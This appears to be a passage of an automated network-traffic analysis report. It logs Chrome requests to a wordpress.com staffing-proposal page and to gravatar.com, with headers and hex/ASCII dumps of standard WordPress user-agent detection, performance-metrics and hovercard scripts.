                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 74 73 20 69 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 55 41 20 69 73 20 69 50 68 6f 6e 65 20 4d 6f 62 69 6c 65 20 53 61 66 61 72 69 20 6f 72 20 61 6e 6f 74 68 65 72 20 69 50 68 6f 6e 65 20 6f 72 20 69 50 6f 64 20 54 6f 75 63 68 20 42 72 6f 77 73 65 72 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 49 50 68 6f 6e 65 4f 72 49 50 6f 64 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 28 20 27 73 61 66 61 72 69 27 20 29 20 26 26 20 28 20 68 61 73 28 20 27 69 70 68 6f 6e 65 27 20 29 20 7c 7c 20 68 61 73 28 20 27 69 70 6f 64 27 20 29 20 29 3b 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 44 65 74 65 63 74 73 20 69 66 20 74 68
                                                                                                                                                                                                                                                Data Ascii: ts if the current UA is iPhone Mobile Safari or another iPhone or iPod Touch Browser. */ isIPhoneOrIPod : check( function() { return has( 'safari' ) && ( has( 'iphone' ) || has( 'ipod' ) ); } ), /** * Detects if th
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 77 73 65 72 20 69 73 20 4f 70 65 72 61 20 4d 69 6e 69 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 4f 70 65 72 61 4d 69 6e 69 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 28 20 27 6f 70 65 72 61 27 20 29 20 26 26 20 68 61 73 28 20 27 6d 69 6e 69 27 20 29 3b 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 69 73 42 6c 61 63 6b 62 65 72 72 79 31 30 28 29 20 63 61 6e 20 62 65 20 75 73 65 64 20 74 6f 20 63 68 65 63 6b 20 74 68 65 20 55 73 65 72 20 41 67 65 6e 74 20 66 6f 72 20 61 20 42 6c 61 63 6b 42 65 72 72 79 20 31 30 20 64 65 76 69 63 65 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 42 6c 61 63 6b 62 65
                                                                                                                                                                                                                                                Data Ascii: wser is Opera Mini */ isOperaMini : check( function() { return has( 'opera' ) && has( 'mini' ); } ), /** * isBlackberry10() can be used to check the User Agent for a BlackBerry 10 device. */ isBlackbe
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 65 72 27 20 29 20 7c 7c 20 68 61 73 28 20 27 6e 6f 6b 69 61 62 72 6f 77 73 65 72 27 20 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 44 65 74 65 63 74 73 20 69 66 20 74 68 65 20 64 65 76 69 63 65 20 70 6c 61 74 66 6f 72 6d 20 69 73 20 74 68 65 20 53 79 6d 62 69 61 6e 20 53 65 72 69 65 73 20 36 30 2e 0a 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 69 73 53 79 6d 62 69 61 6e 50 6c 61 74 66 6f 72 6d 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 68 61 73 28 20 27 77 65 62 6b 69 74 27 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 46 69 72 73 74 2c 20 74 65 73 74 20 66 6f 72 20 57 65 62 4b 69 74
                                                                                                                                                                                                                                                Data Ascii: er' ) || has( 'nokiabrowser' ); } } ), /** * Detects if the device platform is the Symbian Series 60. */ isSymbianPlatform : check( function() { if ( has( 'webkit' ) ) { // First, test for WebKit
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 20 20 20 20 69 73 46 61 63 65 62 6f 6f 6b 46 6f 72 49 70 61 64 20 3a 20 63 68 65 63 6b 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 21 20 68 61 73 28 20 27 69 70 61 64 27 20 29 20 29 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 68 61 73 28 20 27 66 61 63 65 62 6f 6f 6b 27 20 29 20 7c 7c 20 68 61 73 28 20 27 66 62 66 6f 72 69 70 68 6f 6e 65 27 20 29 20 7c 7c 20 68 61 73 28 20 27 66 62 61 6e 2f 66 62 69 6f 73 3b 27 20 29 3b 0a 20 20 20 20 20 20 7d 20 29 2c 0a 0a 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 2a 20 44 65 74 65 63 74 73 20 69 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 55 41 20 69 73 20 46 61 63 65 62 6f 6f 6b 20 66 6f 72 20
                                                                                                                                                                                                                                                Data Ascii: isFacebookForIpad : check( function() { if ( ! has( 'ipad' ) ) return false; return has( 'facebook' ) || has( 'fbforiphone' ) || has( 'fban/fbios;' ); } ), /** * Detects if the current UA is Facebook for
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 6e 74 20 3d 3d 3d 20 66 61 6c 73 65 20 3f 20 66 61 6c 73 65 20 3a 20 66 6e 28 29 20 7c 7c 20 66 61 6c 73 65 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 67 2e 77 70 63 6f 6d 5f 6d 6f 62 69 6c 65 5f 75 73 65 72 5f 61 67 65 6e 74 5f 69 6e 66 6f 20 3d 20 74 3b 0a 0a 7d 20 29 28 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 77 69 6e 64 6f 77 20 3a 20 74 68 69 73 20 29 3b 0a 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 3d 7b 6e 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 65 78 74 75 72 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 28 65 3d 28 65 3d 28 65 2b 3d 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22
                                                                                                                                                                                                                                                Data Ascii: nt === false ? false : fn() || false; } } g.wpcom_mobile_user_agent_info = t;} )( typeof window !== 'undefined' ? window : this );;!function(){"use strict";var e,t={noop:function(){},texturize:function(e){return(e=(e=(e=(e+="").replace(/'/g,"


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.1149754192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:34 UTC632OUTGET /wp-content/js/bilmur-4.min.js?i=12&m=202451 HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC436INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:34 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 11997
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 01 Nov 2024 21:29:27 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "67254837-2edd"
                                                                                                                                                                                                                                                Expires: Sat, 20 Dec 2025 15:45:34 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca MISS
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC933INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 2c 69 29 7b 76 61 72 20 72 2c 6f 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 75 29 7b 74 2e 76 61 6c 75 65 3e 3d 30 26 26 28 75 7c 7c 69 29 26 26 28 28 6f 3d 74 2e 76 61 6c 75 65 2d 28 6e 75 6c 6c 21 3d 72 3f 72 3a 30 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 29 26 26 28 72 3d 74 2e 76 61 6c 75 65 2c 74 2e 64 65 6c 74 61 3d 6f 2c 74 2e 72 61 74 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 3e 74 5b 31 5d 3f 22 70 6f 6f 72 22 3a 6e 3e 74 5b 30 5d 3f 22 6e 65 65 64 73 2d 69 6d 70 72 6f 76 65 6d 65 6e 74 22 3a 22 67 6f 6f 64 22 7d 28 74 2e 76 61 6c 75 65 2c 65 29 2c 6e 28 74 29 29 7d 7d
                                                                                                                                                                                                                                                Data Ascii: !function(){"use strict";var n=function(n,t,e,i){var r,o;return function(u){t.value>=0&&(u||i)&&((o=t.value-(null!=r?r:0))||void 0===r)&&(r=t.value,t.delta=o,t.rating=function(n,t){return n>t[1]?"poor":n>t[0]?"needs-improvement":"good"}(t.value,e),n(t))}}
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 67 61 74 69 6f 6e 54 79 70 65 3a 75 7d 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 64 6f 63 75 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 3f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 29 7d 29 2c 21 30 29 3a 6e 28 29 7d 2c 63 3d 5b 38 30 30 2c 31 38 30 30 5d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 64 6f 63 75 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 3f 75 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 28 6e 29 7d 29 29 3a 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61
                                                                                                                                                                                                                                                Data Ascii: gationType:u}},u=function(n){document.prerendering?addEventListener("prerenderingchange",(function(){return n()}),!0):n()},c=[800,1800],a=function(n){document.prerendering?u((function(){return a(n)})):"complete"!==document.readyState?addEventListener("loa
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 7b 76 61 72 20 6e 3d 22 22 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 62 2e 74 74 66 62 29 72 65 74 75 72 6e 20 6e 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 62 29 76 6f 69 64 20 30 21 3d 3d 62 5b 74 5d 26 26 28 6e 2b 3d 22 26 22 2b 74 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 74 5d 29 29 3b 72 65 74 75 72 6e 20 6e 3f 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 77 70 2e 63 6f 6d 2f 62 6f 6f 6d 2e 67 69 66 3f 62 69 6c 6d 75 72 3d 31 22 2b 6e 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 69 66 28 21 4d 29 7b 4d 3d 21 30 3b 76 61 72 20 6e 3d 45 28 29 3b 69 66 28 6e 29 7b 69 66 28 22 69 6d 61 67 65 22 3d 3d 3d 67 29 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 3b 22 73 65 6e 64 42 65 61 63 6f 6e 22 3d 3d 3d 67
                                                                                                                                                                                                                                                Data Ascii: {var n="";if(void 0===b.ttfb)return n;for(var t in b)void 0!==b[t]&&(n+="&"+t+"="+encodeURIComponent(b[t]));return n?"https://pixel.wp.com/boom.gif?bilmur=1"+n:null}function C(){if(!M){M=!0;var n=E();if(n){if("image"===g)(new Image).src=n;"sendBeacon"===g
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 61 72 20 69 3d 6e 65 77 20 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 6e 2e 67 65 74 45 6e 74 72 69 65 73 28 29 29 7d 29 29 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 6f 62 73 65 72 76 65 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 74 79 70 65 3a 6e 2c 62 75 66 66 65 72 65 64 3a 21 30 7d 2c 65 7c 7c 7b 7d 29 29 2c 69 7d 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 2c 6a 3d 5b 31 38 30 30 2c 33 65 33 5d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 7b 7d 29 2c 75 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 2c 63 3d 46 28 29 2c 61 3d 6f 28 22
                                                                                                                                                                                                                                                Data Ascii: ar i=new PerformanceObserver((function(n){Promise.resolve().then((function(){t(n.getEntries())}))}));return i.observe(Object.assign({type:n,buffered:!0},e||{})),i}}catch(n){}},j=[1800,3e3],B=function(t,i){void 0===i&&(i={}),u((function(){var u,c=F(),a=o("
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 3d 63 2c 75 2e 65 6e 74 72 69 65 73 3d 61 2c 72 28 29 29 7d 2c 64 3d 4e 28 22 6c 61 79 6f 75 74 2d 73 68 69 66 74 22 2c 66 29 3b 64 26 26 28 72 3d 6e 28 74 2c 75 2c 71 2c 69 2e 72 65 70 6f 72 74 41 6c 6c 43 68 61 6e 67 65 73 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 68 69 64 64 65 6e 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 26 26 28 66 28 64 2e 74 61 6b 65 52 65 63 6f 72 64 73 28 29 29 2c 72 28 21 30 29 29 7d 29 29 2c 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 3d 30 2c 75 3d 6f 28 22 43 4c 53 22 2c 30 29 2c 72 3d 6e 28 74 2c 75 2c 71 2c 69 2e 72 65 70 6f 72 74 41 6c 6c 43 68
                                                                                                                                                                                                                                                Data Ascii: =c,u.entries=a,r())},d=N("layout-shift",f);d&&(r=n(t,u,q,i.reportAllChanges),document.addEventListener("visibilitychange",(function(){"hidden"===document.visibilityState&&(f(d.takeRecords()),r(!0))})),e((function(){c=0,u=o("CLS",0),r=n(t,u,q,i.reportAllCh
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 6e 63 79 3f 28 65 2e 65 6e 74 72 69 65 73 3d 5b 6e 5d 2c 65 2e 6c 61 74 65 6e 63 79 3d 6e 2e 64 75 72 61 74 69 6f 6e 29 3a 6e 2e 64 75 72 61 74 69 6f 6e 3d 3d 3d 65 2e 6c 61 74 65 6e 63 79 26 26 6e 2e 73 74 61 72 74 54 69 6d 65 3d 3d 3d 65 2e 65 6e 74 72 69 65 73 5b 30 5d 2e 73 74 61 72 74 54 69 6d 65 26 26 65 2e 65 6e 74 72 69 65 73 2e 70 75 73 68 28 6e 29 3b 65 6c 73 65 7b 76 61 72 20 69 3d 7b 69 64 3a 6e 2e 69 6e 74 65 72 61 63 74 69 6f 6e 49 64 2c 6c 61 74 65 6e 63 79 3a 6e 2e 64 75 72 61 74 69 6f 6e 2c 65 6e 74 72 69 65 73 3a 5b 6e 5d 7d 3b 59 2e 73 65 74 28 69 2e 69 64 2c 69 29 2c 58 2e 70 75 73 68 28 69 29 7d 58 2e 73 6f 72 74 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 6c 61 74 65 6e 63 79 2d 6e 2e 6c 61 74 65 6e 63
                                                                                                                                                                                                                                                Data Ascii: ncy?(e.entries=[n],e.latency=n.duration):n.duration===e.latency&&n.startTime===e.entries[0].startTime&&e.entries.push(n);else{var i={id:n.interactionId,latency:n.duration,entries:[n]};Y.set(i.id,i),X.push(i)}X.sort((function(n,t){return t.latency-n.latenc
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 6e 28 74 2c 61 2c 75 6e 2c 69 2e 72 65 70 6f 72 74 41 6c 6c 43 68 61 6e 67 65 73 29 2c 4f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 76 61 6c 75 65 3d 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 65 2e 74 69 6d 65 53 74 61 6d 70 2c 63 6e 5b 61 2e 69 64 5d 3d 21 30 2c 75 28 21 30 29 7d 29 29 7d 29 29 7d 7d 29 29 7d 2c 66 6e 3d 21 30 3b 76 61 72 20 64 6e 2c 76 6e 2c 6d 6e 3d 5b 22 75 6e 6c 6f 61 64 45 76 65 6e 74 53 74 61 72 74 22 2c 22 75 6e 6c 6f 61 64 45 76 65 6e 74 45 6e 64 22 2c 22 72 65 64 69 72 65 63 74 53 74 61 72 74 22 2c 22 72 65 64 69 72 65 63 74 45 6e 64 22 2c 22 66 65 74 63 68 53 74 61 72 74 22 2c 22 64 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 53 74 61 72 74 22 2c 22 64 6f 6d 61 69 6e 4c 6f 6f 6b 75 70 45 6e 64 22 2c 22 63 6f 6e 6e 65 63 74
                                                                                                                                                                                                                                                Data Ascii: n(t,a,un,i.reportAllChanges),O((function(){a.value=performance.now()-e.timeStamp,cn[a.id]=!0,u(!0)}))}))}}))},fn=!0;var dn,vn,mn=["unloadEventStart","unloadEventEnd","redirectStart","redirectEnd","fetchStart","domainLookupStart","domainLookupEnd","connect
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 74 29 3a 69 2e 66 69 72 73 74 49 6e 74 65 72 69 6d 52 65 73 70 6f 6e 73 65 53 74 61 72 74 2c 62 2e 6e 74 2b 3d 75 28 73 6e 29 29 2c 62 2e 6e 74 2b 3d 68 6e 2c 72 3e 31 26 26 28 62 2e 6e 74 2b 3d 76 6f 69 64 20 30 3d 3d 3d 69 2e 6e 65 78 74 48 6f 70 50 72 6f 74 6f 63 6f 6c 3f 22 22 3a 69 2e 6e 65 78 74 48 6f 70 50 72 6f 74 6f 63 6f 6c 29 2c 62 2e 6e 74 21 3d 3d 6f 26 26 77 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 6e 29 7b 76 61 72 20 65 3d 22 22 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 69 3e 30 26 26 28 65 2b 3d 22 5f 22 29 3b 76 61 72 20 72 3d 74 5b 6e 5d 3b 65 2b 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 22 22 3a 72 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 7d 29 29 2c 65 7d 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                Data Ascii: t):i.firstInterimResponseStart,b.nt+=u(sn)),b.nt+=hn,r>1&&(b.nt+=void 0===i.nextHopProtocol?"":i.nextHopProtocol),b.nt!==o&&w()}}function u(n){var e="";return n.forEach((function(n,i){i>0&&(e+="_");var r=t[n];e+=void 0===r?"":r.toString(36)})),e}}function
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4d 65 61 73 75 72 65 26 26 77 69 6e 64 6f 77 2e 50 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 29 7b 4d 6e 3d 73 28 22 63 75 73 74 6f 6d 4d 65 61 73 75 72 65 73 50 72 65 66 69 78 65 73 22 29 2c 79 6e 3d 73 28 22 63 75 73 74 6f 6d 4d 61 72 6b 73 50 72 65 66 69 78 65 73 22 29 2c 4d 6e 2e 70 75 73 68 28 22 62 69 6c 6d 75 72 5f 22 29 2c 79 6e 2e 70 75 73 68 28 22 62 69 6c 6d 75 72 5f 22 29 3b 76 61 72 20 6e 3d 43 6e 3b 74 72 79 7b 67 6e 3d 70 6e 28 22 6d 61 72 6b 22 2c 6e 29 2c 62 6e 3d 70 6e 28 22 6d 65 61 73 75 72 65 22 2c 6e 29 7d 63 61 74 63 68 28 6e 29 7b 53 6e 28 29 7d 7d 7d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 6e 28 29 7b 53 3d 21 31 2c 44 3d 21 31 2c 78 3d 21 31 2c 6f 6e
                                                                                                                                                                                                                                                Data Ascii: ion(){if(window.PerformanceMeasure&&window.PerformanceMark){Mn=s("customMeasuresPrefixes"),yn=s("customMarksPrefixes"),Mn.push("bilmur_"),yn.push("bilmur_");var n=Cn;try{gn=pn("mark",n),bn=pn("measure",n)}catch(n){Sn()}}}()}function On(){S=!1,D=!1,x=!1,on
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC112INData Raw: 6d 65 6e 74 2e 70 72 65 72 65 6e 64 65 72 69 6e 67 29 26 26 28 22 6c 6f 61 64 69 6e 67 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 46 6e 29 3a 46 6e 28 29 29 7d 28 29 3b 0a
                                                                                                                                                                                                                                                Data Ascii: ment.prerendering)&&("loading"===document.readyState?document.addEventListener("DOMContentLoaded",Fn):Fn())}();


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.1149755192.0.73.24436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:34 UTC642OUTGET /js/hovercards/hovercards.min.js?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e HTTP/1.1
                                                                                                                                                                                                                                                Host: 0.gravatar.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC456INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:34 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 20008
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Fri, 29 Nov 2024 19:32:24 GMT
                                                                                                                                                                                                                                                ETag: "674a16c8-4e28"
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                Expires: Fri, 27 Dec 2024 15:45:34 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=604800
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC913INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 72 29 7b 72 65 74 75 72 6e 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 74 28 72 29 7d
                                                                                                                                                                                                                                                Data Ascii: !function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}
